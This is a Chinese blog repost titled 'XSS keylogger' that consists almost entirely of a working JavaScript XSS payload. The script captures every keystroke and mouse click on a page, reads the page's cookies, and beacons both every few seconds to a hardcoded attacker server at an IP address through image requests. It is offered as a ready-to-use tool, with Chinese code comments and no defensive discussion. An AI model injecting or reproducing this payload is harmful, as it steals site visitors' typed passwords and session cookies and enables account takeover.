XSS键盘记录

作者：admin 发布于：2012-3-12 18:32 Monday 分类：网络转载

var keys='';  //储存键盘鼠标记录
var hacker = 'http://218.6.132.15:8080/xss.php';
var Url = window.location;
var Domain = document.domain;
var Cookie = document.cookie;

document.onkeypress = function(e) {   //劫持键盘消息
get = window.event ? event:e;
key = get.keyCode ? get.keyCode : get.charCode;
switch(key){
case 32 : key = '[Space]';break;
case 13 : key = '[Enter]';break;
case 8  : key = '[BackSpace]';break;
default :
key = String.fromCharCode(key);
keys += key;
}
}

window.onload = function(){  //窗口加载后发送cookie
setInterval(function(){
var Cookie_t = document.cookie;
if(Cookie_t != Cookie){
Cookie = Cookie_t;
}
SendData(hacker + '?m=c&c=' + Cookie);
},2000); //每2秒检测一次cookie,如果变化，就重新发送
}
document.onmousedown = function(e) {
get = window.event ? event : e;  //创建事件对象
var mousekey = get.button;   //获取鼠标键代码
switch(mousekey) {//1 鼠标左键 2 鼠标右键 4 滚动键
case 1 :
mousekey = '[Left Mouse Clik]';break;
case 2 :
mousekey = '[Right Mouse Clik]';break;
case 4 :
mousekey = '[Roll Mouse Clik]';break;
default :
mousekey = '[Unknown Mouse Key]';
}
keys += mousekey;
}
function SendData(src){
new Image().src = src;  //建立图片对象用于发射数据
}

setInterval(function(){ SendData(hacker + '?m=k&c=' + keys);keys = ''; },5000);  //每五秒发送一次键盘记录，初始化变量
by 二月 

标签: XSS